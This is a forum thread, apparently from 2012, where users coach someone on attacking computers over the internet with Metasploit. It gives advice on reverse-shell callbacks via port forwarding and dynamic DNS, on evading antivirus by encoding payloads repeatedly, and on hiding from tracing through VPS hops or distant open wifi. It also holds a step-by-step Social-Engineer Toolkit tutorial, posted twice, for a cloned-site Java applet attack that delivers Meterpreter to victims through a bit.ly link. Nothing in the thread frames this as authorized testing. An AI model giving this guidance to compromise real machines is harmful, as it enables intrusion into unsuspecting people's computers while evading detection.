Metasploit Over The Internet

[ocram6616967]

Hi guys. Metasploit into the LAN works fine, now I'm thinking to use the framework over the internet (for example with a classic payload .exe). How can I do? I've Dynamic IP and I don't want to purchase a static IP from my ISP. Thank :D

[Pwnd2Pwnr]

Do you have BT5?

[digip]

You can do it over the internet, but 1, if you have a router you need to port forward to the box running metasploit so you can receive the calls back and 2, if the target is behind NAT, you need to use some sort of phishing attack or file download, email payload that gets them to click something to point them at you. Most targets these days, aren't sitting right on the modem directly. Although, if you look at HD Moore's talk yesterday from Derbycon, he scanned the entire internet, and found thousands of Windows workstations connected directly to the internet, not behind NAT. Were talking Windows 2000 machines, Windows 7, vista, even nt 4 and win 3.1 i think he saw. Check the video on Iron Geeks youtube channel.

[ocram6616967]

You can do it over the internet, but 1, if you have a router you need to port forward to the box running metasploit so you can receive the calls back and 2, if the target is behind NAT, you need to use some sort of phishing attack or file download, email payload that gets them to click something to point them at you. Most targets these days, aren't sitting right on the modem directly. Although, if you look at HD Moore's talk yesterday from Derbycon, he scanned the entire internet, and found thousands of Windows workstations connected directly to the internet, not behind NAT. Were talking Windows 2000 machines, Windows 7, vista, even nt 4 and win 3.1 i think he saw. Check the video on Iron Geeks youtube channel.

Ok. So, when I create the "exe" I must set "LHOST" with my pubblic IP addres (not with 192.168.1.X ), is that right? Thanks

[ocram6616967]

Do you have BT5?

Yes. I've backtrack R3 64bit B)

[digip]

yes, use your public IP and if need be, set your machine to be in a DMZ(you can use a virtual machine and set it to briged to get an IP from the router and put itself in the DMZ too). Just know when in the DMZ, you're exposed to the internet too, and if you use say, BackTrack with all default passwords, you hack someone, they can hack right back and login to your machine remotely with root/toor and also the default settings and usenames/passwords for the database, etc. One fo the reasosn they always say to use it on a live disc vs native installs, or in a VM you cna revert snapshots to.

[silver-moonshine]

quick one guys , would it not be best too set LHOST at a server in the cloud and Listen on that server , would that not partial mask yourself , as apposed to if the "victoms" PC was saying THISPROGRAM.exe is trying to gain access too 276.65.8.98 (Your IP Address) , just a suggestion for masking yourself , would this work or be worth doing or would you be able too ssh the traffic through another Computer elsewhere.

not that you'd be doing this from home obviously :) but you know , if you had a 3G dongle with pay as you go simcard and were trying too gain access too your home network "on the go" this way that sounds fun :)

just to confuse your "home router" :)

[digip]

If you 1, have a VPS you can install metasploit on then yes, but it still comes back to your VPS, or 2, proxychained your connection through several hops, you could also do that too, but have to make sure all traffic is encrypted too, because some sites you hop through, might see the attack and filter/block it in its path back and forth. Depends on the network, but a lot of people use linode, rackspace and amazon cloud services with their own VPS and remote desktop into the machines to run attacks from the cloud, so it can surely be done. As for making someone not know its you, if its traced back to your account on the cloud server,kind of obvious its still you. If paranoid about all of that, you would need to use open wifi at a location far from your home, cameras and people, in an area you can conceal your actions and not have to spend a whole lot of time at, since these would be like one off hacks where you use a location to do your attack, the move on and never come back to the same place.

Everything on the internet, is traceable to the last hop, up to a point, and even if you use say, TOR, someone could find that TOR exit node and have them shut down, which might keep you safe so long as the TOR exit nodes don't keep logs, but you also then ruin the TOR service for people who use it for legit reasons. I love TOR, but I block it on my sites for that reason alone, because people have attacked my sites over TOR, and its why I wrote TOR block for WordPress. I don't believe in censorship, but I also don't believe in using free services like TOR for nefarious use when you ruin it for legit people who need it to fight censorship and country roadblocks to information.

[silver-moonshine]

I wasn't suggesting using TOR , because the more exit nodes there are , the better , and we dont want them getting shut down:) .i was suggesting the method of through the cloud which digip mentioned and with regards of free wifi access points to save some time searching for a wifi point if you arent mad on wardriving , some people are , im still waiting till i can afford a GPS dongle to go war-cycling around Manchester :) so i can add my results to the cloud on http://wigle.net/ ;) where free access points are easier to find than running round with your laptop out running airodump or Wicd:)

[digip]

ah..the good old days of netstumbler in windows XP and a GPS. I used to plot access points on google earth and make KML files form the netstumbler logs with icons for wifi access points wherver I drove. Fun times...

[murder_face]

Are there still people out there that do things the "old fashioned" way? Don't get me wrong Metasploit is an amazing tool, and I will probably find it more amazing the more I delve into learning ruby, but I just can't help that feel I am missing out on something when I use Metasploit...

[digip]

Are there still people out there that do things the "old fashioned" way? Don't get me wrong Metasploit is an amazing tool, and I will probably find it more amazing the more I delve into learning ruby, but I just can't help that feel I am missing out on something when I use Metasploit...

Metasploit is a double edged sword. On the one hand, if you got a sploit that works, great. On the other, it can be very daunting and difficult to make use of it, because so much of what Metasploit does, is leverage exploits and help automate the payload, but often, you need to roll your own shell code, so you need to know a little about attacking in general. metasploit allows you to leverage vulns you find and help speed up the process, and pick different payloads once you pop the box and then from there, can help you pivot and expand your presence and persistence. Prime example, cobalt strike, which makes using Metasploit that much easier, and adds collaboration, so multiple people can work in tandem, real time chatting and sharing of sessions to attack with different skill sets from each person, so its very powerful, but also a lot to learn and undertake. Honestly, most I;ve ever been successful with it on, is ms08-067 in just testing against my own XP VM's, but thats only because I don't know a 16th of how to really use it.

[Infiltrator]

Hi guys. Metasploit into the LAN works fine, now I'm thinking to use the framework over the internet (for example with a classic payload .exe). How can I do? I've Dynamic IP and I don't want to purchase a static IP from my ISP. Thank :D

To get your payload to connect back to your attacker machine, you definitely need to enable port fordwarding in your router. Also since you are using a dynamic IP address, I would recommend you to look into dyndns.org or no-ip.com, you need to find out which of the two your router supports.

When logging into your router, there should be an option called DDNS or something similar. In there, you will need to supply your no-ip.com or dyndns.org account details. So that, whenever your external IP address, changes it gets synched with the URL.

Edited October 1, 2012 by Infiltrator

[bobbyb1980]

Are there still people out there that do things the "old fashioned" way? Don't get me wrong Metasploit is an amazing tool, and I will probably find it more amazing the more I delve into learning ruby, but I just can't help that feel I am missing out on something when I use Metasploit...

If you have a strong command of the msf api, it can speed up certain things, but it won't make/break you. It's also pretty simple to edit their scripts to your liking, but as a rule of thumb try to create your own code in your language of choice, then if need be you can port it to metasploit. The "old fashioned" way as you say, is really the only way to do it.

Edited October 1, 2012 by bobbyb1980

[ocram6616967]

To get your payload to connect back to your attacker machine, you definitely need to enable port fordwarding in your router. Also since you are using a dynamic IP address, I would recommend you to look into dyndns.org or no-ip.com, you need to find out which of the two your router supports.

When logging into your router, there should be an option called DDNS or something similar. In there, you will need to supply your no-ip.com or dyndns.org account details. So that, whenever your external IP address, changes it gets synched with the URL.

Ok. My ruter is already port forwarded. I've a no-ip account synchronized with DDNS of my router and it works great. So, shall I set LHOST wit no-ip addres instead of my IP address (example.no-ip.com instead of 151.28.200.60 ) ? thanks

[Infiltrator]

Ok. My ruter is already port forwarded. I've a no-ip account synchronized with DDNS of my router and it works great. So, shall I set LHOST wit no-ip addres instead of my IP address (example.no-ip.com instead of 151.28.200.60 ) ? thanks

Correct, that's how it should be done (example.no-ip.com instead of 151.28.200.60 )! If you do the other way around, the payload will have problems finding your attacker machine, when the Ext IP address changes.

[ocram6616967]

Correct, that's how it should be done (example.no-ip.com instead of 151.28.200.60 )! If you do the other way around, the payload will have problems finding your attacker machine, when the Ext IP address changes.

OK thanks! Another question.. Do you know any (working) exploit to send (for exaple with an email) to a windows xp machine (not found by firewall and antivirus) ? thanks

[Infiltrator]

OK thanks! Another question.. Do you know any (working) exploit to send (for exaple with an email) to a windows xp machine (not found by firewall and antivirus) ? thanks

Well, most if not all exploits will be detected by antvirus. The only way to make them undetected is using the built in Metasploit enconders. Shinatakagai, if that's how it's spelt is one of the recommended enconders within Metasploit framework to use.

Sometimes, you will notice that encoding the payload once, will not do the trick, you have to encode it multiple times, in order to achieve a good undetected rate.

Edited October 4, 2012 by Infiltrator

[reflex]

Hi guys not been on in a while, heres a quick tut i wrote.

I ADVISE DOING THIS FROM A LIVE USB OF BACKTRACK AS YOU WILL BE EXPOSED TO THE INTERNET (CAN BE DANGEROUS)

Startup SET

++++++++++++++++

Selct 1) Social-Engineering Attacks

++++++++++++++++

++++++++++++++++

Selct 2) Website Attack Vectors

++++++++++++++++

++++++++++++++++

Selct 1) Java Applet Attack Method

++++++++++++++++

++++++++++++++++

Selct 2) Site Cloner

++++++++++++++++

[-] NAT/Port Forwarding can be used in the cases where your SET machine is

[-] not externally exposed and may be a different IP address than your reverse listener.

set> Are you using NAT/Port Forwarding [yes|no]:

++++++++++++++++

Select YES

++++++++++++++++

set:webattack> IP address to SET web server (this could be your external IP or hostname):

++++++++++++++++

Type in your external IP (open terminal and type "curl ifconfig.me" to find what it is)

++++++++++++++++

set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:

++++++++++++++++

Select NO

++++++++++++++++

set:webattack> Enter the url to clone:

++++++++++++++++

Enter a website you want to clone (http://www.website.com)

++++++++++++++++

What payload do you want to generate:

Name: Description:

1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker

2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker

3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker

4) Windows Bind Shell Execute payload and create an accepting port on remote system

5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline

6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline

7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter

8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports

9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter

11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET

12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support

13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP

14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec

15) PyInjector Shellcode Injection This will drop a meterpreter payload through PyInjector

16) Import your own executable Specify a path for your own executable

++++++++++++++++

Select 14) ShellCodeExec Alphanum Shellcode

++++++++++++++++

set:payloads> PORT of the listener [443]:

++++++++++++++++

Press enter for default port 443

++++++++++++++++

Select the payload you want to deliver via shellcodeexec

1) Windows Meterpreter Reverse TCP

2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager

3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager

4) Windows Meterpreter (ALL PORTS) Reverse TCP

++++++++++++++++

Select 1) Windows Meterpreter Reverse TCP

++++++++++++++++

Wait a while,it will generate the payloads then start metasploit.

While your waiting log into your router, probably 192.168.x.x and look for the DMZ option, should be under NAT or advanced.

Enter your local IP into into the DMZ field, ("ifconfig" in terminal to get lan ip, sure you know that though)

Go to https://bitly.com/ enter your external IP and you will get a link something like http://bit.ly/a00d7M.

Give someone the link and and hope they have Java installed.

Happy Hacking, Reflex.

[Radau]

-snip-

Go to https://bitly.com/ enter your external IP and you will get a link something like http://bit.ly/a00d7M.

Give someone the link and and hope they have Java installed.

Happy Hacking, Reflex.

Dynamic DNS such as No-Ip or DynDNS also works very well over or combined with the bitly links. Some people panic when the website name is just an IP Address for some reason

Edited October 4, 2012 by Radau

[Infiltrator]

Dynamic DNS such as No-Ip or DynDNS also works very well over or combined with the bitly links. Some people panic when the website name is just an IP Address for some reason

That's how I used to access my virtual servers, before I went and purchased a domain, I hated having to remember my IP, everytime it changed.

[ocram6616967]

Dynamic DNS such as No-Ip or DynDNS also works very well over or combined with the bitly links. Some people panic when the website name is just an IP Address for some reason

ahah it's true

[ocram6616967]

Hi guys not been on in a while, heres a quick tut i wrote.

I ADVISE DOING THIS FROM A LIVE USB OF BACKTRACK AS YOU WILL BE EXPOSED TO THE INTERNET (CAN BE DANGEROUS)

Startup SET

++++++++++++++++

Selct 1) Social-Engineering Attacks

++++++++++++++++

++++++++++++++++

Selct 2) Website Attack Vectors

++++++++++++++++

++++++++++++++++

Selct 1) Java Applet Attack Method

++++++++++++++++

++++++++++++++++

Selct 2) Site Cloner

++++++++++++++++

[-] NAT/Port Forwarding can be used in the cases where your SET machine is

[-] not externally exposed and may be a different IP address than your reverse listener.

set> Are you using NAT/Port Forwarding [yes|no]:

++++++++++++++++

Select YES

++++++++++++++++

set:webattack> IP address to SET web server (this could be your external IP or hostname):

++++++++++++++++

Type in your external IP (open terminal and type "curl ifconfig.me" to find what it is)

++++++++++++++++

set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:

++++++++++++++++

Select NO

++++++++++++++++

set:webattack> Enter the url to clone:

++++++++++++++++

Enter a website you want to clone (http://www.website.com)

++++++++++++++++

What payload do you want to generate:

Name: Description:

1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker

2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker

3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker

4) Windows Bind Shell Execute payload and create an accepting port on remote system

5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline

6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline

7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter

8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports

9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter

11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET

12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support

13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP

14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec

15) PyInjector Shellcode Injection This will drop a meterpreter payload through PyInjector

16) Import your own executable Specify a path for your own executable

++++++++++++++++

Select 14) ShellCodeExec Alphanum Shellcode

++++++++++++++++

set:payloads> PORT of the listener [443]:

++++++++++++++++

Press enter for default port 443

++++++++++++++++

Select the payload you want to deliver via shellcodeexec

1) Windows Meterpreter Reverse TCP

2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager

3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager

4) Windows Meterpreter (ALL PORTS) Reverse TCP

++++++++++++++++

Select 1) Windows Meterpreter Reverse TCP

++++++++++++++++

Wait a while,it will generate the payloads then start metasploit.

While your waiting log into your router, probably 192.168.x.x and look for the DMZ option, should be under NAT or advanced.

Enter your local IP into into the DMZ field, ("ifconfig" in terminal to get lan ip, sure you know that though)

Go to https://bitly.com/ enter your external IP and you will get a link something like http://bit.ly/a00d7M.

Give someone the link and and hope they have Java installed.

Happy Hacking, Reflex.

GREATT!! B) Does it work also with windows vista/7 .. ? thanks

[Radau]

GREATT!! B) Does it work also with windows vista/7 .. ? thanks

It should if that version has SET (which it should), I haven't ever tried metasploit from windows actually. I will find out soon enough how well it works on Android... as soon as msfupdate is completed. I swear it has been running for about 12 hours now, oh well patience is a virtue I suppose. B) (image resized)